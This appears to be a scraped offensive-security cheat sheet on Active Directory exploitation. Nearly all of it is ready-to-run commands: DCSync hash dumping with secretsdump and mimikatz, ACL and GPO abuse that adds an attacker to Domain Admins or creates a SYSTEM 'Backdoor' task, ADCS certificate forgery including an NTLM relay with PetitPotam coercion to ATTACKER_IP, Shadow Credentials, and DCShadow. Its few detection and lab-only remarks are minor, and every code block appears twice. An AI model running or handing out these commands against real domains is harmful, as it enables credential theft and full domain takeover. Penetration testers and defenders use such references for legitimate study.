Exploitation
Active Directory Exploitation
Exploit Active Directory misconfigurations to escalate privileges and achieve domain dominance.
Tool Installation
secretsdump
DCSync (Impacket)
pip install impacket Certipy
ADCS attacks
pip install certipy-ad Danger
Many of these attacks can cause significant impact. DCSync and DCShadow especially should be used carefully.
DCSync Attack
Impersonate a Domain Controller and request password hashes via replication. Requires Replicating Directory Changes permissions.
Required Permissions:
Replicating Directory Changes(DS-Replication-Get-Changes)Replicating Directory Changes All(DS-Replication-Get-Changes-All)- Usually held by: Domain Admins, Enterprise Admins, DC machine accounts
Warning
Detection: DCSync triggers event ID 4662 with GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2. SIEM rules often monitor this.
secretsdump (Impacket)
bash
# DCSync all domain hashes
secretsdump.py corp.local/admin:password@dc.corp.local
# DCSync specific user (stealthier)
secretsdump.py -just-dc-user krbtgt corp.local/admin:password@dc.corp.local
secretsdump.py -just-dc-user Administrator corp.local/admin:password@dc.corp.local
# DCSync with hash (Pass-the-Hash)
secretsdump.py -hashes :NTLM_HASH corp.local/admin@dc.corp.local
# DCSync with Kerberos ticket
export KRB5CCNAME=admin.ccache
secretsdump.py -k -no-pass dc.corp.local
# Output NTLM hashes only (smaller output)
secretsdump.py -just-dc-ntlm corp.local/admin:password@dc.corp.local
# Output includes:
# - NTLM hashes for all users
# - Kerberos keys (AES256, AES128, DES)
# - Cleartext passwords (if reversible encryption enabled)
# - Password history# DCSync all domain hashes
secretsdump.py corp.local/admin:password@dc.corp.local
# DCSync specific user (stealthier)
secretsdump.py -just-dc-user krbtgt corp.local/admin:password@dc.corp.local
secretsdump.py -just-dc-user Administrator corp.local/admin:password@dc.corp.local
# DCSync with hash (Pass-the-Hash)
secretsdump.py -hashes :NTLM_HASH corp.local/admin@dc.corp.local
# DCSync with Kerberos ticket
export KRB5CCNAME=admin.ccache
secretsdump.py -k -no-pass dc.corp.local
# Output NTLM hashes only (smaller output)
secretsdump.py -just-dc-ntlm corp.local/admin:password@dc.corp.local
# Output includes:
# - NTLM hashes for all users
# - Kerberos keys (AES256, AES128, DES)
# - Cleartext passwords (if reversible encryption enabled)
# - Password historyMimikatz DCSync
text
# DCSync specific user
mimikatz# lsadump::dcsync /domain:corp.local /user:Administrator
# DCSync krbtgt (for Golden Ticket)
mimikatz# lsadump::dcsync /domain:corp.local /user:krbtgt
# DCSync all users to CSV
mimikatz# lsadump::dcsync /domain:corp.local /all /csv
# DCSync with alternate credentials
mimikatz# lsadump::dcsync /domain:corp.local /user:Administrator /authuser:admin /authpassword:Password123 /authdomain:corp.local
# Output includes NTLM hash, AES keys, and password last set
# Look for 'Hash NTLM:' in output# DCSync specific user
mimikatz# lsadump::dcsync /domain:corp.local /user:Administrator
# DCSync krbtgt (for Golden Ticket)
mimikatz# lsadump::dcsync /domain:corp.local /user:krbtgt
# DCSync all users to CSV
mimikatz# lsadump::dcsync /domain:corp.local /all /csv
# DCSync with alternate credentials
mimikatz# lsadump::dcsync /domain:corp.local /user:Administrator /authuser:admin /authpassword:Password123 /authdomain:corp.local
# Output includes NTLM hash, AES keys, and password last set
# Look for 'Hash NTLM:' in outputACL Abuse
Active Directory objects have Access Control Lists that define permissions. Misconfigured ACLs can lead to privilege escalation.
Dangerous Rights:
GenericAll- Full control over objectGenericWrite- Write any propertyWriteDacl- Modify permissionsWriteOwner- Change object ownerForceChangePassword- Reset password without knowing currentAddMember- Add members to group
Find Abusable ACLs
powershell
# PowerView - Find interesting ACLs on all objects
Import-Module .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGUIDs | Out-File acls.txt
# ACLs for specific group (Domain Admins)
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner|GenericWrite"}
# ACLs where your user has rights
Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -eq (Get-DomainUser attacker).objectsid}
# Find users with DCSync rights
Get-DomainObjectAcl -SearchBase "DC=corp,DC=local" -ResolveGUIDs | Where-Object {$_.ObjectAceType -match 'DS-Replication'}
# BloodHound cypher query - shortest path to Domain Admins
MATCH p=shortestPath((u:User {name:'ATTACKER@CORP.LOCAL'})-[*1..]->(g:Group {name: 'DOMAIN ADMINS@CORP.LOCAL'})) RETURN p# PowerView - Find interesting ACLs on all objects
Import-Module .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGUIDs | Out-File acls.txt
# ACLs for specific group (Domain Admins)
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner|GenericWrite"}
# ACLs where your user has rights
Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -eq (Get-DomainUser attacker).objectsid}
# Find users with DCSync rights
Get-DomainObjectAcl -SearchBase "DC=corp,DC=local" -ResolveGUIDs | Where-Object {$_.ObjectAceType -match 'DS-Replication'}
# BloodHound cypher query - shortest path to Domain Admins
MATCH p=shortestPath((u:User {name:'ATTACKER@CORP.LOCAL'})-[*1..]->(g:Group {name: 'DOMAIN ADMINS@CORP.LOCAL'})) RETURN pGenericAll Abuse
With GenericAll, you have full control. The exploitation depends on the target object type.
powershell
# GenericAll on USER - Reset password
net user targetuser NewPassword123! /domain
# PowerView password reset
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force)
# Or set SPN and Kerberoast
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn'}
GetUserSPNs.py corp.local/attacker:password -dc-ip DC_IP -request-user targetuser
# Or set "Don't require preauth" and AS-REP roast
Set-DomainObject -Identity targetuser -XOR @{useraccountcontrol=4194304}
GetNPUsers.py corp.local/targetuser -dc-ip DC_IP -no-pass
# GenericAll on GROUP - Add yourself as member
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'attacker'
net group "Domain Admins" attacker /add /domain
# GenericAll on COMPUTER - RBCD attack
# See Kerberos section for full RBCD chain
rbcd.py -delegate-to TARGET$ -delegate-from YOURPC$ -dc-ip DC_IP corp.local/attacker:password -action write# GenericAll on USER - Reset password
net user targetuser NewPassword123! /domain
# PowerView password reset
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force)
# Or set SPN and Kerberoast
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn'}
GetUserSPNs.py corp.local/attacker:password -dc-ip DC_IP -request-user targetuser
# Or set "Don't require preauth" and AS-REP roast
Set-DomainObject -Identity targetuser -XOR @{useraccountcontrol=4194304}
GetNPUsers.py corp.local/targetuser -dc-ip DC_IP -no-pass
# GenericAll on GROUP - Add yourself as member
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'attacker'
net group "Domain Admins" attacker /add /domain
# GenericAll on COMPUTER - RBCD attack
# See Kerberos section for full RBCD chain
rbcd.py -delegate-to TARGET$ -delegate-from YOURPC$ -dc-ip DC_IP corp.local/attacker:password -action writeWriteDACL Abuse
WriteDACL allows modifying permissions - grant yourself any right you need.
powershell
# Grant yourself DCSync rights on domain root
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' -PrincipalIdentity attacker -Rights DCSync
# Now perform DCSync
secretsdump.py corp.local/attacker:password@dc.corp.local
# Grant GenericAll on target user
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity attacker -Rights All
# Then reset their password
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
# Impacket dacledit.py (remote)
dacledit.py -action 'write' -rights 'DCSync' -principal 'attacker' -target-dn 'DC=corp,DC=local' corp.local/user:password# Grant yourself DCSync rights on domain root
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' -PrincipalIdentity attacker -Rights DCSync
# Now perform DCSync
secretsdump.py corp.local/attacker:password@dc.corp.local
# Grant GenericAll on target user
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity attacker -Rights All
# Then reset their password
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass!' -AsPlainText -Force)
# Impacket dacledit.py (remote)
dacledit.py -action 'write' -rights 'DCSync' -principal 'attacker' -target-dn 'DC=corp,DC=local' corp.local/user:passwordWriteOwner Abuse
powershell
# Take ownership
Set-DomainObjectOwner -Identity targetuser -OwnerIdentity attacker
# Then grant yourself rights
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity attacker -Rights All# Take ownership
Set-DomainObjectOwner -Identity targetuser -OwnerIdentity attacker
# Then grant yourself rights
Add-DomainObjectAcl -TargetIdentity targetuser -PrincipalIdentity attacker -Rights AllGPO Abuse
Group Policy Objects push configurations to computers and users. If you can modify a GPO, you can compromise all systems in its scope.
Tip
High Impact: A GPO linked to the domain root affects ALL computers. Always check the GPO's scope before exploiting.
Find Modifiable GPOs
powershell
# Find GPOs where you have write access
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner"}
# Check which OUs a GPO applies to
Get-DomainGPO -Identity "VulnerableGPO" | ForEach-Object { Get-DomainOU -GPLink $_.distinguishedname }
# Or check which computers are in those OUs
Get-DomainOU -GPLink "CN={GPO-GUID},CN=Policies,CN=System,DC=corp,DC=local" | ForEach-Object { Get-DomainComputer -SearchBase $_.distinguishedname }
# BloodHound query - GPO control
MATCH p=(u:User)-[:GenericAll|GenericWrite|WriteOwner|WriteDacl]->(g:GPO) RETURN p# Find GPOs where you have write access
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner"}
# Check which OUs a GPO applies to
Get-DomainGPO -Identity "VulnerableGPO" | ForEach-Object { Get-DomainOU -GPLink $_.distinguishedname }
# Or check which computers are in those OUs
Get-DomainOU -GPLink "CN={GPO-GUID},CN=Policies,CN=System,DC=corp,DC=local" | ForEach-Object { Get-DomainComputer -SearchBase $_.distinguishedname }
# BloodHound query - GPO control
MATCH p=(u:User)-[:GenericAll|GenericWrite|WriteOwner|WriteDacl]->(g:GPO) RETURN pSharpGPOAbuse
SharpGPOAbuse automates GPO modification attacks. Changes take effect at next GPO refresh (every 90 mins) or on reboot.
powershell
# Download: https://github.com/FSecureLABS/SharpGPOAbuse/releases
# Add local admin via GPO (immediate effect on next gpupdate)
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "VulnerableGPO"
# Add startup script (runs as SYSTEM on boot)
SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "net localgroup administrators attacker /add" --GPOName "VulnerableGPO"
# Create immediate scheduled task (faster than waiting for gpupdate)
SharpGPOAbuse.exe --AddComputerTask --TaskName "Backdoor" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c net localgroup administrators attacker /add" --GPOName "VulnerableGPO"
# Add user rights assignment
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "VulnerableGPO"
# Force GPO update on target (if you have access)
gpupdate /force# Download: https://github.com/FSecureLABS/SharpGPOAbuse/releases
# Add local admin via GPO (immediate effect on next gpupdate)
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "VulnerableGPO"
# Add startup script (runs as SYSTEM on boot)
SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "net localgroup administrators attacker /add" --GPOName "VulnerableGPO"
# Create immediate scheduled task (faster than waiting for gpupdate)
SharpGPOAbuse.exe --AddComputerTask --TaskName "Backdoor" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c net localgroup administrators attacker /add" --GPOName "VulnerableGPO"
# Add user rights assignment
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "VulnerableGPO"
# Force GPO update on target (if you have access)
gpupdate /forceADCS Attacks (Certipy)
Active Directory Certificate Services can be abused to escalate privileges. Multiple vulnerabilities exist (ESC1-ESC13).
Common ESC Vulnerabilities:
ESC1- Template allows SAN and Client AuthESC4- Vulnerable template ACLsESC6- EDITF_ATTRIBUTESUBJECTALTNAME2 flagESC7- Vulnerable CA ACLsESC8- NTLM relay to web enrollment
Find Vulnerable Templates
bash
# Install Certipy
pip install certipy-ad
# Enumerate all ADCS information
certipy find -u user@corp.local -p password -dc-ip DC_IP
certipy find -u user@corp.local -p password -dc-ip DC_IP -json # JSON output
# Find only vulnerable templates (recommended)
certipy find -u user@corp.local -p password -dc-ip DC_IP -vulnerable
# Output shows ESC vulnerabilities by number
# Look for: [!] Vulnerabilities
# ESC1, ESC2, etc. with detailed explanation# Install Certipy
pip install certipy-ad
# Enumerate all ADCS information
certipy find -u user@corp.local -p password -dc-ip DC_IP
certipy find -u user@corp.local -p password -dc-ip DC_IP -json # JSON output
# Find only vulnerable templates (recommended)
certipy find -u user@corp.local -p password -dc-ip DC_IP -vulnerable
# Output shows ESC vulnerabilities by number
# Look for: [!] Vulnerabilities
# ESC1, ESC2, etc. with detailed explanationESC1 - Misconfigured Templates
Template allows specifying Subject Alternative Name (SAN) in request, enabling impersonation of any user.
bash
# Request certificate impersonating Administrator
certipy req -u user@corp.local -p password -ca corp-CA -target ca.corp.local -template VulnerableTemplate -upn administrator@corp.local
# Certificate saved as administrator.pfx
# Authenticate with certificate to get TGT and NT hash
certipy auth -pfx administrator.pfx -dc-ip DC_IP
# Output: Got hash and saved TGT to administrator.ccache
# Hash NTLM: aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# Use hash for Pass-the-Hash
psexec.py -hashes :NTLM_HASH Administrator@dc.corp.local
# Or use TGT
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass dc.corp.local# Request certificate impersonating Administrator
certipy req -u user@corp.local -p password -ca corp-CA -target ca.corp.local -template VulnerableTemplate -upn administrator@corp.local
# Certificate saved as administrator.pfx
# Authenticate with certificate to get TGT and NT hash
certipy auth -pfx administrator.pfx -dc-ip DC_IP
# Output: Got hash and saved TGT to administrator.ccache
# Hash NTLM: aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# Use hash for Pass-the-Hash
psexec.py -hashes :NTLM_HASH Administrator@dc.corp.local
# Or use TGT
export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass dc.corp.localESC4 - Template ACL Abuse
bash
# Modify template to be vulnerable
certipy template -u user@corp.local -p password -template VulnerableTemplate -save-old
# Request certificate
certipy req -u user@corp.local -p password -ca corp-CA -target ca.corp.local -template VulnerableTemplate -upn administrator@corp.local
# Restore template
certipy template -u user@corp.local -p password -template VulnerableTemplate -configuration VulnerableTemplate.json# Modify template to be vulnerable
certipy template -u user@corp.local -p password -template VulnerableTemplate -save-old
# Request certificate
certipy req -u user@corp.local -p password -ca corp-CA -target ca.corp.local -template VulnerableTemplate -upn administrator@corp.local
# Restore template
certipy template -u user@corp.local -p password -template VulnerableTemplate -configuration VulnerableTemplate.jsonESC8 - NTLM Relay to ADCS
Relay NTLM authentication to ADCS web enrollment to get a certificate as the relayed user.
bash
# Terminal 1: Start relay to ADCS web enrollment
sudo ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Terminal 2: Coerce DC authentication (PetitPotam)
python PetitPotam.py ATTACKER_IP DC_IP
# ntlmrelayx outputs Base64 certificate
# Save and convert
echo 'BASE64...' | base64 -d > dc.pfx
# Or use certipy to request directly
# Authenticate with DC certificate
certipy auth -pfx dc.pfx -dc-ip DC_IP
# Now you have DC machine account hash - DCSync!
secretsdump.py -hashes :DC_NTLM_HASH corp.local/DC$@DC_IP# Terminal 1: Start relay to ADCS web enrollment
sudo ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Terminal 2: Coerce DC authentication (PetitPotam)
python PetitPotam.py ATTACKER_IP DC_IP
# ntlmrelayx outputs Base64 certificate
# Save and convert
echo 'BASE64...' | base64 -d > dc.pfx
# Or use certipy to request directly
# Authenticate with DC certificate
certipy auth -pfx dc.pfx -dc-ip DC_IP
# Now you have DC machine account hash - DCSync!
secretsdump.py -hashes :DC_NTLM_HASH corp.local/DC$@DC_IPTip
ESC8 Attack Chain: Coerce DC → Relay to ADCS → Get DC cert → Auth as DC → DCSync all hashes = Full domain compromise
Shadow Credentials
Add a \"shadow\" certificate credential to an account's msDS-KeyCredentialLink attribute. Requires GenericWrite on target.
Requirements:
- Write access to target's msDS-KeyCredentialLink attribute
- Domain must have ADCS or Azure AD
- Target must be a user or computer account
bash
# Certipy shadow credentials (auto mode - easiest)
certipy shadow auto -u attacker@corp.local -p password -account targetuser
# Outputs: Saved certificate and NTLM hash
# Manual steps
certipy shadow add -u attacker@corp.local -p password -account targetuser
certipy shadow auth -pfx targetuser.pfx -dc-ip DC_IP
# Pywhisker alternative
git clone https://github.com/ShutdownRepo/pywhisker.git
python pywhisker.py -d corp.local -u attacker -p password --target targetuser --action add
# List shadow credentials
python pywhisker.py -d corp.local -u attacker -p password --target targetuser --action list
# Remove shadow credential (cleanup)
certipy shadow remove -u attacker@corp.local -p password -account targetuser -device-id DEVICE_ID# Certipy shadow credentials (auto mode - easiest)
certipy shadow auto -u attacker@corp.local -p password -account targetuser
# Outputs: Saved certificate and NTLM hash
# Manual steps
certipy shadow add -u attacker@corp.local -p password -account targetuser
certipy shadow auth -pfx targetuser.pfx -dc-ip DC_IP
# Pywhisker alternative
git clone https://github.com/ShutdownRepo/pywhisker.git
python pywhisker.py -d corp.local -u attacker -p password --target targetuser --action add
# List shadow credentials
python pywhisker.py -d corp.local -u attacker -p password --target targetuser --action list
# Remove shadow credential (cleanup)
certipy shadow remove -u attacker@corp.local -p password -account targetuser -device-id DEVICE_IDDCShadow (Risky)
Danger
DCShadow modifies AD directly and can cause replication issues. Use only in authorized lab environments.
text
# Register rogue DC and push changes
mimikatz# lsadump::dcshadow /object:targetuser /attribute:primaryGroupId /value:512
# In another mimikatz instance (as SYSTEM on DC)
mimikatz# lsadump::dcshadow /push# Register rogue DC and push changes
mimikatz# lsadump::dcshadow /object:targetuser /attribute:primaryGroupId /value:512
# In another mimikatz instance (as SYSTEM on DC)
mimikatz# lsadump::dcshadow /pushExternal Resources
The Hacker Recipes - DCSync
Comprehensive DCSync guide
Certipy - GitHub
ADCS enumeration and exploitation tool
HackTricks - ACL Abuse
Active Directory ACL attack reference
Certified Pre-Owned - SpecterOps
Original ADCS research whitepaper
SharpGPOAbuse - GitHub
GPO exploitation tool
pywhisker - GitHub
Shadow Credentials manipulation